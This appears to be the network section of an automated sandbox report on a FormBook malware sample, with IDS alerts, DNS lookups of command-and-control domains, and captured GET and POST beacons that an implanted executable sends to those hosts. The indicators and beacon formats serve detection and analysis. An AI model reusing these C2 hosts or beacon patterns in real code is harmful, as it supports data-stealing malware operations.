                                              2025-01-10T18:03:35.763872+01002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.549990104.21.64.180TCP
                                              2025-01-10T18:04:26.663076+01002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.549892161.97.142.14480TCP
                                              2025-01-10T18:04:42.525231+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.549979172.96.187.6080TCP
                                              2025-01-10T18:04:45.239495+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.549980172.96.187.6080TCP
                                              2025-01-10T18:04:47.653195+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.549981172.96.187.6080TCP
                                              2025-01-10T18:04:50.155662+01002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.549982172.96.187.6080TCP
                                              2025-01-10T18:04:56.451357+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.549983185.199.108.15380TCP
                                              2025-01-10T18:04:58.992300+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.549984185.199.108.15380TCP
                                              2025-01-10T18:05:01.557997+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.549985185.199.108.15380TCP
                                              2025-01-10T18:05:04.117065+01002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.549986185.199.108.15380TCP
                                              2025-01-10T18:05:10.670177+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.549987104.21.64.180TCP
                                              2025-01-10T18:05:13.233018+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.549988104.21.64.180TCP
                                              2025-01-10T18:05:15.795444+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.549989104.21.64.180TCP
                                              TimestampSource PortDest PortSource IPDest IP
                                              Jan 10, 2025 18:04:26.028780937 CET4989280192.168.2.5161.97.142.144
                                              Jan 10, 2025 18:04:26.034486055 CET8049892161.97.142.144192.168.2.5
                                              Jan 10, 2025 18:04:26.034605026 CET4989280192.168.2.5161.97.142.144
                                              Jan 10, 2025 18:04:26.044209957 CET4989280192.168.2.5161.97.142.144
                                              Jan 10, 2025 18:04:26.049072981 CET8049892161.97.142.144192.168.2.5
                                              Jan 10, 2025 18:04:26.662902117 CET8049892161.97.142.144192.168.2.5
                                              Jan 10, 2025 18:04:26.662926912 CET8049892161.97.142.144192.168.2.5
                                              Jan 10, 2025 18:04:26.662945986 CET8049892161.97.142.144192.168.2.5
                                              Jan 10, 2025 18:04:26.662965059 CET8049892161.97.142.144192.168.2.5
                                              Jan 10, 2025 18:04:26.662981987 CET8049892161.97.142.144192.168.2.5
                                              Jan 10, 2025 18:04:26.663075924 CET4989280192.168.2.5161.97.142.144
                                              Jan 10, 2025 18:04:26.663181067 CET4989280192.168.2.5161.97.142.144
                                              Jan 10, 2025 18:04:26.673808098 CET4989280192.168.2.5161.97.142.144
                                              Jan 10, 2025 18:04:26.679066896 CET8049892161.97.142.144192.168.2.5
                                              Jan 10, 2025 18:04:42.052784920 CET4997980192.168.2.5172.96.187.60
                                              Jan 10, 2025 18:04:42.057626963 CET8049979172.96.187.60192.168.2.5
                                              Jan 10, 2025 18:04:42.058381081 CET4997980192.168.2.5172.96.187.60
                                              Jan 10, 2025 18:04:42.082901955 CET4997980192.168.2.5172.96.187.60
                                              Jan 10, 2025 18:04:42.087719917 CET8049979172.96.187.60192.168.2.5
                                              Jan 10, 2025 18:04:42.525103092 CET8049979172.96.187.60192.168.2.5
                                              Jan 10, 2025 18:04:42.525142908 CET8049979172.96.187.60192.168.2.5
                                              Jan 10, 2025 18:04:42.525230885 CET4997980192.168.2.5172.96.187.60
                                              Jan 10, 2025 18:04:43.593053102 CET4997980192.168.2.5172.96.187.60
                                              Jan 10, 2025 18:04:44.610644102 CET4998080192.168.2.5172.96.187.60
                                              Jan 10, 2025 18:04:44.615741968 CET8049980172.96.187.60192.168.2.5
                                              Jan 10, 2025 18:04:44.615843058 CET4998080192.168.2.5172.96.187.60
                                              Jan 10, 2025 18:04:44.630234003 CET4998080192.168.2.5172.96.187.60
                                              Jan 10, 2025 18:04:44.635145903 CET8049980172.96.187.60192.168.2.5
                                              Jan 10, 2025 18:04:45.239418983 CET8049980172.96.187.60192.168.2.5
                                              Jan 10, 2025 18:04:45.239435911 CET8049980172.96.187.60192.168.2.5
                                              Jan 10, 2025 18:04:45.239495039 CET4998080192.168.2.5172.96.187.60
                                              Jan 10, 2025 18:04:45.239520073 CET8049980172.96.187.60192.168.2.5
                                              Jan 10, 2025 18:04:45.239588976 CET4998080192.168.2.5172.96.187.60
                                              Jan 10, 2025 18:04:46.138875008 CET4998080192.168.2.5172.96.187.60
                                              Jan 10, 2025 18:04:47.159337997 CET4998180192.168.2.5172.96.187.60
                                              Jan 10, 2025 18:04:47.164263964 CET8049981172.96.187.60192.168.2.5
                                              Jan 10, 2025 18:04:47.168061018 CET4998180192.168.2.5172.96.187.60
                                              Jan 10, 2025 18:04:47.177798033 CET4998180192.168.2.5172.96.187.60
                                              Jan 10, 2025 18:04:47.182638884 CET8049981172.96.187.60192.168.2.5
                                              Jan 10, 2025 18:04:47.182748079 CET8049981172.96.187.60192.168.2.5
                                              Jan 10, 2025 18:04:47.652982950 CET8049981172.96.187.60192.168.2.5
                                              Jan 10, 2025 18:04:47.653109074 CET8049981172.96.187.60192.168.2.5
                                              Jan 10, 2025 18:04:47.653194904 CET4998180192.168.2.5172.96.187.60
                                              Jan 10, 2025 18:04:48.685825109 CET4998180192.168.2.5172.96.187.60
                                              Jan 10, 2025 18:04:49.704807997 CET4998280192.168.2.5172.96.187.60
                                              Jan 10, 2025 18:04:49.711261988 CET8049982172.96.187.60192.168.2.5
                                              Jan 10, 2025 18:04:49.711455107 CET4998280192.168.2.5172.96.187.60
                                              Jan 10, 2025 18:04:49.720448971 CET4998280192.168.2.5172.96.187.60
                                              Jan 10, 2025 18:04:49.726423979 CET8049982172.96.187.60192.168.2.5
                                              Jan 10, 2025 18:04:50.155373096 CET8049982172.96.187.60192.168.2.5
                                              Jan 10, 2025 18:04:50.155391932 CET8049982172.96.187.60192.168.2.5
                                              Jan 10, 2025 18:04:50.155662060 CET4998280192.168.2.5172.96.187.60
                                              Jan 10, 2025 18:04:50.158351898 CET4998280192.168.2.5172.96.187.60
                                              Jan 10, 2025 18:04:50.163189888 CET8049982172.96.187.60192.168.2.5
                                              Jan 10, 2025 18:04:55.966648102 CET4998380192.168.2.5185.199.108.153
                                              Jan 10, 2025 18:04:55.971522093 CET8049983185.199.108.153192.168.2.5
                                              Jan 10, 2025 18:04:55.971617937 CET4998380192.168.2.5185.199.108.153
                                              Jan 10, 2025 18:04:55.987482071 CET4998380192.168.2.5185.199.108.153
                                              Jan 10, 2025 18:04:55.993524075 CET8049983185.199.108.153192.168.2.5
                                              Jan 10, 2025 18:04:56.433792114 CET8049983185.199.108.153192.168.2.5
                                              Jan 10, 2025 18:04:56.451258898 CET8049983185.199.108.153192.168.2.5
                                              Jan 10, 2025 18:04:56.451356888 CET4998380192.168.2.5185.199.108.153
                                              Jan 10, 2025 18:04:57.498337984 CET4998380192.168.2.5185.199.108.153
                                              Jan 10, 2025 18:04:58.516860962 CET4998480192.168.2.5185.199.108.153
                                              Jan 10, 2025 18:04:58.521836042 CET8049984185.199.108.153192.168.2.5
                                              Jan 10, 2025 18:04:58.521923065 CET4998480192.168.2.5185.199.108.153
                                              Jan 10, 2025 18:04:58.536694050 CET4998480192.168.2.5185.199.108.153
                                              Jan 10, 2025 18:04:58.541657925 CET8049984185.199.108.153192.168.2.5
                                              Jan 10, 2025 18:04:58.975395918 CET8049984185.199.108.153192.168.2.5
                                              Jan 10, 2025 18:04:58.992204905 CET8049984185.199.108.153192.168.2.5
                                              Jan 10, 2025 18:04:58.992300034 CET4998480192.168.2.5185.199.108.153
                                              Jan 10, 2025 18:05:00.045135975 CET4998480192.168.2.5185.199.108.153
                                              Jan 10, 2025 18:05:01.063771963 CET4998580192.168.2.5185.199.108.153
                                              Jan 10, 2025 18:05:01.068842888 CET8049985185.199.108.153192.168.2.5
                                              Jan 10, 2025 18:05:01.068969011 CET4998580192.168.2.5185.199.108.153
                                              Jan 10, 2025 18:05:01.083332062 CET4998580192.168.2.5185.199.108.153
                                              Jan 10, 2025 18:05:01.088129997 CET8049985185.199.108.153192.168.2.5
                                              Jan 10, 2025 18:05:01.088288069 CET8049985185.199.108.153192.168.2.5
                                              Jan 10, 2025 18:05:01.540545940 CET8049985185.199.108.153192.168.2.5
                                              Jan 10, 2025 18:05:01.557746887 CET8049985185.199.108.153192.168.2.5
                                              Jan 10, 2025 18:05:01.557996988 CET4998580192.168.2.5185.199.108.153
                                              Jan 10, 2025 18:05:02.592145920 CET4998580192.168.2.5185.199.108.153
                                              Jan 10, 2025 18:05:03.610908985 CET4998680192.168.2.5185.199.108.153
                                              Jan 10, 2025 18:05:03.615840912 CET8049986185.199.108.153192.168.2.5
                                              Jan 10, 2025 18:05:03.616071939 CET4998680192.168.2.5185.199.108.153
                                              Jan 10, 2025 18:05:03.629528999 CET4998680192.168.2.5185.199.108.153
                                              Jan 10, 2025 18:05:03.634497881 CET8049986185.199.108.153192.168.2.5
                                              Jan 10, 2025 18:05:04.096872091 CET8049986185.199.108.153192.168.2.5
                                              Jan 10, 2025 18:05:04.116914988 CET8049986185.199.108.153192.168.2.5
                                              Jan 10, 2025 18:05:04.117064953 CET4998680192.168.2.5185.199.108.153
                                              Jan 10, 2025 18:05:04.118309021 CET4998680192.168.2.5185.199.108.153
                                              Jan 10, 2025 18:05:04.124192953 CET8049986185.199.108.153192.168.2.5
                                              Jan 10, 2025 18:05:09.143978119 CET4998780192.168.2.5104.21.64.1
                                              Jan 10, 2025 18:05:09.149053097 CET8049987104.21.64.1192.168.2.5
                                              Jan 10, 2025 18:05:09.149163008 CET4998780192.168.2.5104.21.64.1
                                              Jan 10, 2025 18:05:09.163453102 CET4998780192.168.2.5104.21.64.1
                                              Jan 10, 2025 18:05:09.168323994 CET8049987104.21.64.1192.168.2.5
                                              Jan 10, 2025 18:05:10.670176983 CET4998780192.168.2.5104.21.64.1
                                              Jan 10, 2025 18:05:10.675390959 CET8049987104.21.64.1192.168.2.5
                                              Jan 10, 2025 18:05:10.675509930 CET4998780192.168.2.5104.21.64.1
                                              Jan 10, 2025 18:05:11.690280914 CET4998880192.168.2.5104.21.64.1
                                              Jan 10, 2025 18:05:11.695300102 CET8049988104.21.64.1192.168.2.5
                                              Jan 10, 2025 18:05:11.695441008 CET4998880192.168.2.5104.21.64.1
                                              Jan 10, 2025 18:05:11.716317892 CET4998880192.168.2.5104.21.64.1
                                              Jan 10, 2025 18:05:11.721354961 CET8049988104.21.64.1192.168.2.5
                                              Jan 10, 2025 18:05:13.233017921 CET4998880192.168.2.5104.21.64.1
                                              Jan 10, 2025 18:05:13.238090992 CET8049988104.21.64.1192.168.2.5
                                              Jan 10, 2025 18:05:13.238240004 CET4998880192.168.2.5104.21.64.1
                                              Jan 10, 2025 18:05:14.255937099 CET4998980192.168.2.5104.21.64.1
                                              Jan 10, 2025 18:05:14.260888100 CET8049989104.21.64.1192.168.2.5
                                              Jan 10, 2025 18:05:14.261003017 CET4998980192.168.2.5104.21.64.1
                                              Jan 10, 2025 18:05:14.286490917 CET4998980192.168.2.5104.21.64.1
                                              Jan 10, 2025 18:05:14.291378021 CET8049989104.21.64.1192.168.2.5
                                              Jan 10, 2025 18:05:14.291491985 CET8049989104.21.64.1192.168.2.5
                                              Jan 10, 2025 18:05:15.795444012 CET4998980192.168.2.5104.21.64.1
                                              Jan 10, 2025 18:05:15.800666094 CET8049989104.21.64.1192.168.2.5
                                              Jan 10, 2025 18:05:15.800764084 CET4998980192.168.2.5104.21.64.1
                                              Jan 10, 2025 18:05:16.813529968 CET4999080192.168.2.5104.21.64.1
                                              Jan 10, 2025 18:05:16.818388939 CET8049990104.21.64.1192.168.2.5
                                              Jan 10, 2025 18:05:16.818500996 CET4999080192.168.2.5104.21.64.1
                                              Jan 10, 2025 18:05:16.827178955 CET4999080192.168.2.5104.21.64.1
                                              Jan 10, 2025 18:05:16.831955910 CET8049990104.21.64.1192.168.2.5
                                              TimestampSource PortDest PortSource IPDest IP
                                              Jan 10, 2025 18:04:25.840127945 CET5429553192.168.2.51.1.1.1
                                              Jan 10, 2025 18:04:26.021337032 CET53542951.1.1.1192.168.2.5
                                              Jan 10, 2025 18:04:41.784287930 CET6509053192.168.2.51.1.1.1
                                              Jan 10, 2025 18:04:42.046879053 CET53650901.1.1.1192.168.2.5
                                              Jan 10, 2025 18:04:55.173877954 CET5134053192.168.2.51.1.1.1
                                              Jan 10, 2025 18:04:55.959219933 CET53513401.1.1.1192.168.2.5
                                              Jan 10, 2025 18:05:09.126724005 CET5269253192.168.2.51.1.1.1
                                              Jan 10, 2025 18:05:09.141566992 CET53526921.1.1.1192.168.2.5
                                              TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                              Jan 10, 2025 18:04:25.840127945 CET192.168.2.51.1.1.10x3481Standard query (0)www.030002513.xyzA (IP address)IN (0x0001)false
                                              Jan 10, 2025 18:04:41.784287930 CET192.168.2.51.1.1.10xa6a5Standard query (0)www.mbakjisoo.siteA (IP address)IN (0x0001)false
                                              Jan 10, 2025 18:04:55.173877954 CET192.168.2.51.1.1.10xb125Standard query (0)www.pku-cs-cjw.topA (IP address)IN (0x0001)false
                                              Jan 10, 2025 18:05:09.126724005 CET192.168.2.51.1.1.10x6c0aStandard query (0)www.vilakodsiy.sbsA (IP address)IN (0x0001)false
                                              TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                              Jan 10, 2025 18:04:26.021337032 CET1.1.1.1192.168.2.50x3481No error (0)www.030002513.xyz161.97.142.144A (IP address)IN (0x0001)false
                                              Jan 10, 2025 18:04:42.046879053 CET1.1.1.1192.168.2.50xa6a5No error (0)www.mbakjisoo.sitembakjisoo.siteCNAME (Canonical name)IN (0x0001)false
                                              Jan 10, 2025 18:04:42.046879053 CET1.1.1.1192.168.2.50xa6a5No error (0)mbakjisoo.site172.96.187.60A (IP address)IN (0x0001)false
                                              Jan 10, 2025 18:04:55.959219933 CET1.1.1.1192.168.2.50xb125No error (0)www.pku-cs-cjw.top187370.github.ioCNAME (Canonical name)IN (0x0001)false
                                              Jan 10, 2025 18:04:55.959219933 CET1.1.1.1192.168.2.50xb125No error (0)187370.github.io185.199.108.153A (IP address)IN (0x0001)false
                                              Jan 10, 2025 18:04:55.959219933 CET1.1.1.1192.168.2.50xb125No error (0)187370.github.io185.199.109.153A (IP address)IN (0x0001)false
                                              Jan 10, 2025 18:04:55.959219933 CET1.1.1.1192.168.2.50xb125No error (0)187370.github.io185.199.110.153A (IP address)IN (0x0001)false
                                              Jan 10, 2025 18:04:55.959219933 CET1.1.1.1192.168.2.50xb125No error (0)187370.github.io185.199.111.153A (IP address)IN (0x0001)false
                                              Jan 10, 2025 18:05:09.141566992 CET1.1.1.1192.168.2.50x6c0aNo error (0)www.vilakodsiy.sbs104.21.64.1A (IP address)IN (0x0001)false
                                              Jan 10, 2025 18:05:09.141566992 CET1.1.1.1192.168.2.50x6c0aNo error (0)www.vilakodsiy.sbs104.21.48.1A (IP address)IN (0x0001)false
                                              Jan 10, 2025 18:05:09.141566992 CET1.1.1.1192.168.2.50x6c0aNo error (0)www.vilakodsiy.sbs104.21.96.1A (IP address)IN (0x0001)false
                                              Jan 10, 2025 18:05:09.141566992 CET1.1.1.1192.168.2.50x6c0aNo error (0)www.vilakodsiy.sbs104.21.112.1A (IP address)IN (0x0001)false
                                              Jan 10, 2025 18:05:09.141566992 CET1.1.1.1192.168.2.50x6c0aNo error (0)www.vilakodsiy.sbs104.21.80.1A (IP address)IN (0x0001)false
                                              Jan 10, 2025 18:05:09.141566992 CET1.1.1.1192.168.2.50x6c0aNo error (0)www.vilakodsiy.sbs104.21.16.1A (IP address)IN (0x0001)false
                                              Jan 10, 2025 18:05:09.141566992 CET1.1.1.1192.168.2.50x6c0aNo error (0)www.vilakodsiy.sbs104.21.32.1A (IP address)IN (0x0001)false
                                              • www.030002513.xyz
                                              • www.mbakjisoo.site
                                              • www.pku-cs-cjw.top
                                              • www.vilakodsiy.sbs
                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              0192.168.2.549892161.97.142.144802764C:\Program Files (x86)\PiUkMVbUwuHXbqoCLfEUYACZKrCveIQVlNtXojQA\YZKoIsKkwLJWPq.exe
                                              TimestampBytes transferredDirectionData
                                              Jan 10, 2025 18:04:26.044209957 CET549OUTGET /95le/?Fz=2jBhVn&gjR=ZgllZHsiydchqBHBA1JMF+RoiwLw/ScJ/Jj32S4NIs+PSlV3776FANxFoYb4iH80r13xZ8RWQuyuUHwO/KTQwNAs4TqSGhVWgu7Bj48jZrfSqhqsOqTV9cKaFb+b133wug== HTTP/1.1
                                              Host: www.030002513.xyz
                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                              Accept-Language: en-US,en
                                              Connection: close
                                              User-Agent: Mozilla/5.0 (Linux; U; Android 4.2.2; en-us; GT-P7510 Build/JDQ39; CyanogenMod-10.1) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Safari/534.30
                                              Jan 10, 2025 18:04:26.662902117 CET1236INHTTP/1.1 404 Not Found
                                              Server: nginx
                                              Date: Fri, 10 Jan 2025 17:04:26 GMT
                                              Content-Type: text/html; charset=utf-8
                                              Content-Length: 2966
                                              Connection: close
                                              Vary: Accept-Encoding
                                              ETag: "66cce1df-b96"
                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 09 3c 68 65 61 64 3e 0a 09 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 20 2f 3e 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 20 2f 3e 0a 09 09 3c 74 69 74 6c 65 3e 50 61 67 65 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 09 09 3c 73 74 79 6c 65 3e 0a 09 09 09 62 6f 64 79 20 7b 0a 09 09 09 09 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 35 66 35 66 35 3b 0a 09 09 09 09 6d 61 72 67 69 6e 2d 74 6f 70 3a 20 38 25 3b 0a 09 09 09 09 63 6f 6c 6f 72 3a 20 23 35 64 35 64 35 64 3b 0a 09 09 09 09 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 2d 61 70 70 6c 65 2d 73 79 73 74 65 6d 2c 20 42 6c 69 6e 6b 4d 61 63 53 79 73 74 65 6d 46 6f 6e 74 2c 20 22 53 65 67 6f 65 20 55 49 22 2c 20 52 6f 62 6f 74 6f 2c 20 22 48 [TRUNCATED]
                                              Data Ascii: <!DOCTYPE html><html lang="en"><head><meta charset="utf-8" /><meta name="viewport" content="width=device-width, initial-scale=1" /><title>Page Not Found</title><style>body {background-color: #f5f5f5;margin-top: 8%;color: #5d5d5d;font-family: -apple-system, BlinkMacSystemFont, "Segoe UI", Roboto, "Helvetica Neue", Arial,"Noto Sans", sans-serif, "Apple Color Emoji", "Segoe UI Emoji", "Segoe UI Symbol","Noto Color Emoji";text-shadow: 0px 1px 1px rgba(255, 255, 255, 0.75);text-align: center;}h1 {font-size: 2.45em;font-weight: 700;color: #5d5d5d;letter-spacing: -0.02em;margin-bottom: 30px;margin-top: 30px;}.container {width: 100%;margin-right: auto;margin-left: auto;}.animate__animated {animation-duration: 1s;animation-fill-mode: both;}.animate__fadeIn {animation-name: fadeIn;}.info {color: #5594cf;fill: #5594cf;}.error [TRUNCATED]
                                              Jan 10, 2025 18:04:26.662926912 CET224INData Raw: 3b 0a 09 09 09 09 66 69 6c 6c 3a 20 23 63 39 32 31 32 37 3b 0a 09 09 09 7d 0a 0a 09 09 09 2e 77 61 72 6e 69 6e 67 20 7b 0a 09 09 09 09 63 6f 6c 6f 72 3a 20 23 66 66 63 63 33 33 3b 0a 09 09 09 09 66 69 6c 6c 3a 20 23 66 66 63 63 33 33 3b 0a 09 09
                                              Data Ascii: ;fill: #c92127;}.warning {color: #ffcc33;fill: #ffcc33;}.success {color: #5aba47;fill: #5aba47;}.icon-large {height: 132px;width: 132px;}.description-tex
                                              Jan 10, 2025 18:04:26.662945986 CET1236INData Raw: 74 20 7b 0a 09 09 09 09 63 6f 6c 6f 72 3a 20 23 37 30 37 30 37 30 3b 0a 09 09 09 09 6c 65 74 74 65 72 2d 73 70 61 63 69 6e 67 3a 20 2d 30 2e 30 31 65 6d 3b 0a 09 09 09 09 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 2e 32 35 65 6d 3b 0a 09 09 09 09 6c 69
                                              Data Ascii: t {color: #707070;letter-spacing: -0.01em;font-size: 1.25em;line-height: 20px;}.footer {margin-top: 40px;font-size: 0.7em;}.animate__delay-1s {animation-delay: 1s;}@keyframes fadeIn
                                              Jan 10, 2025 18:04:26.662965059 CET474INData Raw: 2d 32 30 2e 36 33 35 2d 34 36 2d 34 36 2d 34 36 7a 22 0a 09 09 09 09 09 09 09 3e 3c 2f 70 61 74 68 3e 0a 09 09 09 09 09 09 3c 2f 73 76 67 3e 0a 09 09 09 09 09 3c 2f 64 69 76 3e 0a 09 09 09 09 09 3c 68 31 20 63 6c 61 73 73 3d 22 61 6e 69 6d 61 74
                                              Data Ascii: -20.635-46-46-46z"></path></svg></div><h1 class="animate__animated animate__fadeIn">Page Not Found</h1><div class="description-text animate__animated animate__fadeIn animate__delay-1s"><p>Oops! We couldn


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              1192.168.2.549979172.96.187.60802764C:\Program Files (x86)\PiUkMVbUwuHXbqoCLfEUYACZKrCveIQVlNtXojQA\YZKoIsKkwLJWPq.exe
                                              TimestampBytes transferredDirectionData
                                              Jan 10, 2025 18:04:42.082901955 CET817OUTPOST /s7cs/ HTTP/1.1
                                              Host: www.mbakjisoo.site
                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                              Accept-Encoding: gzip, deflate, br
                                              Accept-Language: en-US,en
                                              Origin: http://www.mbakjisoo.site
                                              Content-Type: application/x-www-form-urlencoded
                                              Connection: close
                                              Cache-Control: max-age=0
                                              Content-Length: 204
                                              Referer: http://www.mbakjisoo.site/s7cs/
                                              User-Agent: Mozilla/5.0 (Linux; U; Android 4.2.2; en-us; GT-P7510 Build/JDQ39; CyanogenMod-10.1) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Safari/534.30
                                              Data Raw: 67 6a 52 3d 61 44 6d 64 5a 66 30 71 31 75 77 31 55 79 6f 52 4c 33 7a 72 69 6c 4e 2f 37 46 35 57 58 48 55 50 53 62 6e 75 33 57 33 43 74 36 73 39 39 6c 63 4d 48 76 39 32 6d 76 4a 2b 2f 41 77 46 70 55 67 2f 32 65 4e 52 51 4e 32 45 4f 6a 73 61 4c 75 78 5a 74 76 2f 75 65 4d 42 38 6d 43 6e 47 2f 64 59 79 6d 2b 67 47 5a 67 55 31 7a 54 47 33 7a 68 6e 52 42 4f 57 56 55 50 2f 76 68 63 47 57 4b 59 4c 73 61 68 32 50 73 62 4a 4c 49 2f 72 73 49 78 38 78 45 39 44 52 53 7a 34 51 68 51 32 68 5a 65 34 59 67 4d 6f 5a 73 6e 71 50 44 53 6c 48 4c 73 62 38 46 64 74 76 4a 72 78 42 73 6e 36 66 2f 5a 42 4d 6c 32 36 35 57 6e 51 3d
                                              Data Ascii: gjR=aDmdZf0q1uw1UyoRL3zrilN/7F5WXHUPSbnu3W3Ct6s99lcMHv92mvJ+/AwFpUg/2eNRQN2EOjsaLuxZtv/ueMB8mCnG/dYym+gGZgU1zTG3zhnRBOWVUP/vhcGWKYLsah2PsbJLI/rsIx8xE9DRSz4QhQ2hZe4YgMoZsnqPDSlHLsb8FdtvJrxBsn6f/ZBMl265WnQ=
                                              Jan 10, 2025 18:04:42.525103092 CET1033INHTTP/1.1 404 Not Found
                                              Connection: close
                                              cache-control: private, no-cache, no-store, must-revalidate, max-age=0
                                              pragma: no-cache
                                              content-type: text/html
                                              content-length: 796
                                              date: Fri, 10 Jan 2025 17:04:42 GMT
                                              server: LiteSpeed
                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 [TRUNCATED]
                                              Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">404</h1><h2 style="margin-top:20px;font-size: 30px;">Not Found</h2><p>The resource requested could not be found on this server!</p></div></div></body></html>


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              2192.168.2.549980172.96.187.60802764C:\Program Files (x86)\PiUkMVbUwuHXbqoCLfEUYACZKrCveIQVlNtXojQA\YZKoIsKkwLJWPq.exe
                                              TimestampBytes transferredDirectionData
                                              Jan 10, 2025 18:04:44.630234003 CET837OUTPOST /s7cs/ HTTP/1.1
                                              Host: www.mbakjisoo.site
                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                              Accept-Encoding: gzip, deflate, br
                                              Accept-Language: en-US,en
                                              Origin: http://www.mbakjisoo.site
                                              Content-Type: application/x-www-form-urlencoded
                                              Connection: close
                                              Cache-Control: max-age=0
                                              Content-Length: 224
                                              Referer: http://www.mbakjisoo.site/s7cs/
                                              User-Agent: Mozilla/5.0 (Linux; U; Android 4.2.2; en-us; GT-P7510 Build/JDQ39; CyanogenMod-10.1) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Safari/534.30
                                              Data Raw: 67 6a 52 3d 61 44 6d 64 5a 66 30 71 31 75 77 31 53 57 73 52 51 51 48 72 6b 46 4e 2b 33 6c 35 57 63 6e 55 4c 53 62 6a 75 33 53 48 53 74 73 30 39 39 41 59 4d 45 71 52 32 68 76 4a 2b 77 67 77 4b 74 55 67 4f 32 65 42 6a 51 4d 61 45 4f 6a 34 61 4c 76 42 5a 75 59 54 76 4d 73 42 2b 71 69 6e 45 67 4e 59 79 6d 2b 67 47 5a 67 41 54 7a 54 4f 33 79 53 2f 52 42 71 43 57 49 66 2f 73 6d 63 47 57 4f 59 4c 6f 61 68 33 67 73 65 67 65 49 39 54 73 49 77 4d 78 45 49 33 53 59 7a 34 53 38 41 33 50 5a 4d 74 44 69 2b 77 69 6c 42 33 6d 57 6b 78 74 44 36 71 57 66 2f 6c 48 61 4c 64 35 38 30 79 6f 75 70 67 6c 2f 56 71 4a 49 77 45 5a 78 46 6d 53 2b 42 51 70 63 53 6b 42 6c 45 77 6c 58 4a 42 79
                                              Data Ascii: gjR=aDmdZf0q1uw1SWsRQQHrkFN+3l5WcnULSbju3SHSts099AYMEqR2hvJ+wgwKtUgO2eBjQMaEOj4aLvBZuYTvMsB+qinEgNYym+gGZgATzTO3yS/RBqCWIf/smcGWOYLoah3gsegeI9TsIwMxEI3SYz4S8A3PZMtDi+wilB3mWkxtD6qWf/lHaLd580youpgl/VqJIwEZxFmS+BQpcSkBlEwlXJBy
